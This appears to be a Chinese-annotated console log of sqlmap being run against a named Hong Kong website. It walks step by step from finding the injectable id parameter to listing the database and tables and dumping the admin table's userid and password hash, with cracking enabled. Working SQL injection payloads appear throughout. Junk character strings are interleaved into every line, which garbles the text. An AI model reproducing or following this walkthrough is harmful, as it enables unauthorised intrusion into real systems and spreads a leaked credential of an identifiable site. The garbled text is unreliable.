D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db4 E) p1 J- v3 B+ k5 n3 i+ z$ K
ms "Mysql" --current-user /* 注解:获取当前用户名称7 g6 I X# U" q8 ~$ p6 i
sqlmap/0.9 - automatic SQL injection and database takeover tool
- r! [# V X4 [0 A http://sqlmap.sourceforge.net starting at: 16:53:54/ }& Q1 {$ z H# P m
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
* ^* j' Y O, n/ v; A, x session file6 Z: r: W: X# w' b
[16:53:54] [INFO] resuming injection data from session file
6 I! l7 {0 R% p[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file+ E6 P1 g6 [/ o9 f8 j9 \
[16:53:54] [INFO] testing connection to the target url
6 f$ W, [: J2 P h8 Jsqlmap identified the following injection points with a total of 0 HTTP(s) reque
' [/ K5 D# J# F& h. j! x& D3 jsts:) r0 m1 y6 ]% L3 |
--- U. V# q: F9 e( o$ P
Place: GET
) V' r% C+ M" t ?, P- \Parameter: id) A9 ^4 ^; [& @# h# O
Type: boolean-based blind3 ]' z% l2 r& y" X5 ` n$ Q
Title: AND boolean-based blind - WHERE or HAVING clause0 x2 ~0 C4 U- G# s. s* V
Payload: id=276 AND 799=799: F, b! t0 C$ m) Z9 ]
Type: error-based
+ g9 a0 }8 y/ p: N3 | Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
/ Z# t/ q7 C! h0 i Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
! u* ^+ w- E. Q$ T120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,581 r6 [! l3 k( `9 ]3 d
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)# w" G# A: T0 ~3 b- _- f
Type: UNION query' o& s8 t, G& w7 ~
Title: MySQL UNION query (NULL) - 1 to 10 columns
: Q- r0 A6 }) b9 k7 L0 z! u Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
/ A, Z# W9 {. v1 [% m% V% J5 q(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),1 s, l) t$ Y j% ?
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
, F$ g& v- U8 p* E7 b' P Type: AND/OR time-based blind0 E6 S) |/ X3 v1 g# v
Title: MySQL > 5.0.11 AND time-based blind
4 C: \, X4 ]. t# j Payload: id=276 AND SLEEP(5)
: ?$ r% I# H M1 s0 G---
/ R$ R; w0 e3 l' y I7 ]- i[16:53:55] [INFO] the back-end DBMS is MySQL
$ ^4 T' ~8 X* X, l% Vweb server operating system: Windows
" ~# e/ O3 Z3 L& y y4 Lweb application technology: Apache 2.2.11, PHP 5.3.0
# q* J' V; c% a, a4 m( }; Zback-end DBMS: MySQL 5.0' s$ r" J5 K+ Q+ V! M) |
[16:53:55] [INFO] fetching current user8 Q+ H v b* O6 d% X: Q
current user: 'root@localhost' $ r, {1 I2 s* q3 {- Q
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
9 o! W' d4 |* qtput\www.wepost.com.hk' shutting down at: 16:53:58
+ Z$ C5 |0 K! R$ }/ o
7 B# `+ s& ~6 v" H G. A5 t2 {+ nD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
0 B" T$ ^0 d3 R. [$ a5 Cms "Mysql" --current-db /*当前数据库
6 m% M; C8 b) A1 Z% b* e sqlmap/0.9 - automatic SQL injection and database takeover tool+ y/ t/ N2 h' x7 T: d( w1 ^& Y/ P
http://sqlmap.sourceforge.net starting at: 16:54:16
; N6 ^# T1 \# i% g4 d3 ~1 G. v1 T[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
" p7 u2 v; L# b* R$ m; y6 W session file
4 ?. r: n5 E! J3 j[16:54:16] [INFO] resuming injection data from session file
6 W5 q. ]! A# B0 ] }: q1 t[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
% P9 y$ i8 T2 V( x[16:54:16] [INFO] testing connection to the target url
, `" S9 T' g6 @8 t+ }& \sqlmap identified the following injection points with a total of 0 HTTP(s) reque
8 ]) ]0 g G& ^! l) C; ksts:: @5 @7 d: ]3 J% f* P9 B2 a& D
---
9 s R/ _! f% k* l8 r. _1 T APlace: GET: f9 a7 B+ v0 {4 i! r
Parameter: id
$ Y6 i; P+ H5 T, {% j1 k# I Type: boolean-based blind( f5 C/ i6 B* K+ |, V2 O
Title: AND boolean-based blind - WHERE or HAVING clause
H9 q9 Y# L: Q% Y, W+ k: M4 j Payload: id=276 AND 799=799$ h u" r7 Z; Z+ c- p
Type: error-based/ u! b! Z6 W, i+ h
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause: H# j. R, p _* X& }4 |0 M
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
" ?; r0 a! G* q& w D! B6 z. Y120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58% g7 o; I' W: k6 g& D
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a). L& D, r3 y; G+ @, ^+ M
Type: UNION query) j3 J% J0 N& J9 H
Title: MySQL UNION query (NULL) - 1 to 10 columns
, X7 W# @7 K& @4 w! w: A/ ? Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
, c4 d1 Q7 L- P+ s$ ]# h(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),- p( z7 U7 v3 p! x, W
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
$ _" w- ?( }# ?8 O' u Type: AND/OR time-based blind
# P. r( M i6 ~5 U& Z3 ?% ? Title: MySQL > 5.0.11 AND time-based blind
( ^9 ~& j K& r; p" A7 c1 m Payload: id=276 AND SLEEP(5)
c; t3 F) h! O* {---% Z! c: b; X5 J" f& ]6 F
[16:54:17] [INFO] the back-end DBMS is MySQL$ x9 y4 z$ j$ D. B% _% e( q
web server operating system: Windows
8 a' q6 h* F2 t' Aweb application technology: Apache 2.2.11, PHP 5.3.0 w @# x# ~ }9 i( ^/ b
back-end DBMS: MySQL 5.0: g+ B9 y* @2 P. |7 l" i
[16:54:17] [INFO] fetching current database
7 O _1 T8 f4 c$ qcurrent database: 'wepost'$ r( n. u n! ^* k
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou' q8 { |# W: c# R4 z$ K( z9 \
tput\www.wepost.com.hk' shutting down at: 16:54:183 [; t2 Z6 [+ S Q. E. Z" r* m
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db" V% m1 G9 p5 l' Z8 E2 ^& c
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
: R3 W, A* K2 U4 ]: w sqlmap/0.9 - automatic SQL injection and database takeover tool
- t6 l+ P3 h' U http://sqlmap.sourceforge.net starting at: 16:55:25 C# C4 M9 N) R; `- ~" U4 x
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as2 d5 W7 g; @5 U
session file
! C3 i, B+ N5 Y8 C: W5 S9 V[16:55:25] [INFO] resuming injection data from session file
8 ~5 d, }- d x4 h* a- n! D[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file, a+ Y8 K$ {7 `- g# d' k3 K
[16:55:25] [INFO] testing connection to the target url* X5 K5 N" O, V$ K- v. d
sqlmap identified the following injection points with a total of 0 HTTP(s) reque. V' W1 W5 m# H( o( d2 o" |) W3 o
sts:% `0 ~+ A& T# [5 L5 P+ s
---
1 y! Z; y. C" B3 O& N& q9 XPlace: GET
3 ?/ m" K! R' X, A5 O lParameter: id& e' X, p& _+ |1 u% U; b: B' c
Type: boolean-based blind; S) B1 {; L* l1 C1 {
Title: AND boolean-based blind - WHERE or HAVING clause
# R0 w |# O* s$ r; v Payload: id=276 AND 799=799- |: q q$ I9 d( i2 W% c6 Z2 k
Type: error-based% ]( b" `. I; i( B. ]& d8 V4 u4 ~
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
2 W" C9 k4 s3 g% X& A Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
6 R& j8 |+ l: Y3 c! y120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
" R% n! ?' `9 A/ m) Y$ v),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
: H: B& V/ q3 x: v7 `; |4 J Type: UNION query
/ _; A8 `, I! a8 i Title: MySQL UNION query (NULL) - 1 to 10 columns
7 e* R0 T5 m+ K& N9 Z' y Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR& \6 p3 \; l3 V, X4 B: Y
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
/ X) u( `- r( z1 m4 \ S5 G) J( lCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#8 Z" r6 O) E- h; s2 Z: D
Type: AND/OR time-based blind
6 Y) w( q) t+ e# m( z5 [& ` Title: MySQL > 5.0.11 AND time-based blind* {5 G3 I- |. V2 S, _5 O
Payload: id=276 AND SLEEP(5)
. U$ c/ g" b0 h7 B; `---
$ S# G; T' d" g/ M5 f9 C[16:55:26] [INFO] the back-end DBMS is MySQL
: L7 p6 G. W1 w# n# j4 l6 L0 `web server operating system: Windows
/ [: A% C9 i6 S! A, W( n& s6 Y1 W4 u$ [web application technology: Apache 2.2.11, PHP 5.3.0
$ W* ]: Q, Z& J0 d9 A6 z9 pback-end DBMS: MySQL 5.0
+ m" O7 h6 {) }[16:55:26] [INFO] fetching tables for database 'wepost'& Y/ ?2 ?) u5 d
[16:55:27] [INFO] the SQL query used returns 6 entries
/ A( i+ C$ F. x) t1 f, JDatabase: wepost$ X1 d6 j: X/ V- @+ \2 O$ i, T$ M
[6 tables]
* O7 @5 O. K! V+-------------+
1 r4 u9 d5 v: G| admin |2 R# Y2 u i# f2 K0 `" T$ } q; U
| article |
* D( a2 j# ?% j- O. u9 }2 ~| contributor |1 z8 e o/ \* N. O! U( w8 M" J
| idea |# Z8 v( J$ M. O9 j+ y$ l( K$ W
| image |" O# V1 k- N* m0 Z) l
| issue |
: Z, i* p6 x: {& h$ J, d+-------------+
; q" U% S) o8 n {/ e, ^- l4 U( V: Y[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou1 b. v( y- N. }, X" ?0 Z1 U% r
tput\www.wepost.com.hk' shutting down at: 16:55:33 ?4 _6 S' h; A3 P3 T0 d8 R5 f; m$ q
" L& {# y& F6 Q1 u- }% TD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db5 s) q0 y; P# ?' p
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
5 g O+ e, A4 J sqlmap/0.9 - automatic SQL injection and database takeover tool
8 h6 |' J" n( B# S http://sqlmap.sourceforge.net starting at: 16:56:06
2 M0 {3 w7 }1 f/ p+ [$ u& ^. r3 tsqlmap identified the following injection points with a total of 0 HTTP(s) reque5 w4 _7 L. A" D$ {
sts:$ o' E* d3 E* K9 z/ A
---& t. d" e3 ~( J2 A' f7 u: P, V
Place: GET. E+ o" U7 W8 o7 q, K- K4 y$ P
Parameter: id
' |7 b; A3 G2 e2 ? h Type: boolean-based blind% Y* ~' ?4 D) g$ d. p0 d2 E2 Q
Title: AND boolean-based blind - WHERE or HAVING clause
4 d$ |, I3 x& f0 v Payload: id=276 AND 799=799
/ A% c- m% {( V/ Z1 A Type: error-based: E$ r8 k2 U+ `: h
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
" U6 S6 r2 Y. K! Z, Y Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,# B5 d2 W) a& ^! |
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,581 g& i4 p' F: e
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
# x5 Y3 }0 ~3 r' w' e Type: UNION query
0 I& J( U3 g1 ]( E/ J4 [ Title: MySQL UNION query (NULL) - 1 to 10 columns
; U* {" J, l# U. E0 h5 U: X* }. B Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR7 U$ A9 ]% b( {
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),( g+ J5 A+ v$ i9 W4 z2 S! V6 x
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#9 a) Q+ U9 D8 I
Type: AND/OR time-based blind+ q: C+ c- \. r& D
Title: MySQL > 5.0.11 AND time-based blind
' C+ F8 @: o; l! R; g2 }# j6 C Payload: id=276 AND SLEEP(5)
/ ^: O7 c5 M" U; R( W---0 m$ |0 U% u' S8 {2 j
web server operating system: Windows
8 D# S8 C8 j9 i3 ?" W/ B" @; S* Zweb application technology: Apache 2.2.11, PHP 5.3.0
6 @+ B+ _ p% c3 A9 Yback-end DBMS: MySQL 5.0
' h- ^0 W' i6 ^7 e0 o3 i/ S- G$ j7 L[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
" ?# m; g, |) K% c9 w- Jssion': wepost, wepost
, F V$ c0 K2 E% d: y& X4 ]Database: wepost
, W# y: x5 H2 cTable: admin, \' _; Q; @- i
[4 columns]
! U+ X0 A% b6 y1 P+----------+-------------+; ~/ K& ~" D7 |* e# f# Z8 O |% ?
| Column | Type |
) X8 t9 ]3 `) H, x+ ^* M7 F3 @+----------+-------------+ w, ]/ z! F0 \. ^7 K
| id | int(11) |
3 x& s' k s3 {! g n| password | varchar(32) |1 ]: @8 ?2 l. c8 L, n- ?
| type | varchar(10) |
- W0 @! K$ z1 m& T2 V| userid | varchar(20) |% `1 l5 P: w, m$ Y2 o
+----------+-------------+
) f! ]% K' V0 u$ T! C H/ E/ n shutting down at: 16:56:19" B) `% k& c0 g1 G+ z+ R1 L( {
$ m0 ], u, b1 Z |. _ M# GD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
& n; z* X T& Ims "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容3 z" P3 v" c4 }) ]# r# C
sqlmap/0.9 - automatic SQL injection and database takeover tool' R- N' R& ]: G% Z1 o! b; {9 B
http://sqlmap.sourceforge.net starting at: 16:57:14+ S+ e' J2 |! x& @9 ^& K2 N- J
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
: T5 c& l3 ]; Q7 S* bsts:
: Z. y4 c) `% [1 o# j% Z u) s---1 e) F) w! p. l& M
Place: GET, k0 d% e% F" l7 W; F7 A
Parameter: id
' Z. _& E% H; K. g; p Type: boolean-based blind8 J, y. n z% B+ q9 W
Title: AND boolean-based blind - WHERE or HAVING clause
8 h( ^, ]- @5 Z& J S; e2 a Payload: id=276 AND 799=7993 s0 t8 R6 K4 E, Y
Type: error-based
( y, E, K" G$ C) |/ T2 C Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause, W7 E+ S6 J8 o- q' R6 ~
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
: Z$ h c5 e, m120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
0 ]8 `, a( `1 u6 S! F! K& D# l) ~),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)3 y4 K7 H* N& v$ n- ]) B
Type: UNION query( g& Y7 z, a+ i1 K- X% p
Title: MySQL UNION query (NULL) - 1 to 10 columns& U' p N, W2 S# G! H/ M
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR7 y1 X' D- o* F7 o) \
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
- w$ `( w# h1 h# z6 {, p; e$ oCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
$ T: E# C7 A8 q Type: AND/OR time-based blind
& E) n8 h4 Q- v8 W I Title: MySQL > 5.0.11 AND time-based blind Z$ O8 O4 I9 W6 A6 j
Payload: id=276 AND SLEEP(5)
2 E9 D {; l* a& B' y+ ?9 m" Z---
& E+ R5 A- Z$ Z9 m+ i& d4 \web server operating system: Windows
9 D' J& k* o% e! Yweb application technology: Apache 2.2.11, PHP 5.3.0. J" ~ m+ H( R: ^: _, G" F6 L
back-end DBMS: MySQL 5.0/ o/ h" l3 [/ l% L1 p7 }5 t+ W: ]) l
recognized possible password hash values. do you want to use dictionary attack o
7 j' F: r" E5 M5 U% c, bn retrieved table items? [Y/n/q] y! d+ H8 ]4 y, d) W; t7 Y& Q
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
6 K4 U/ u3 r% T) Odo you want to use common password suffixes? (slow!) [y/N] y7 p) L* }% M7 i, U3 p( ^
Database: wepost _+ t$ j3 m! E! {* Y
Table: admin% Y% U5 T/ {6 J! x# N+ j
[1 entry]8 o2 `6 U/ ]: R, x) b$ Y' Y5 }
+----------------------------------+------------+
+ P) B9 A. F. X+ N. s& I* `| password | userid |$ ]5 _* w* T: W- k% k2 i& [% ^
+----------------------------------+------------+
) k: |+ L3 D! p2 c" N| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
: ~8 ]) I0 D! n9 _: R+----------------------------------+------------+1 N* H# ]2 `+ a
shutting down at: 16:58:141 B, d8 e- x4 p% K n) n9 r0 T
4 R5 l& d, i- c- W/ K6 j# {D:\Python27\sqlmap> |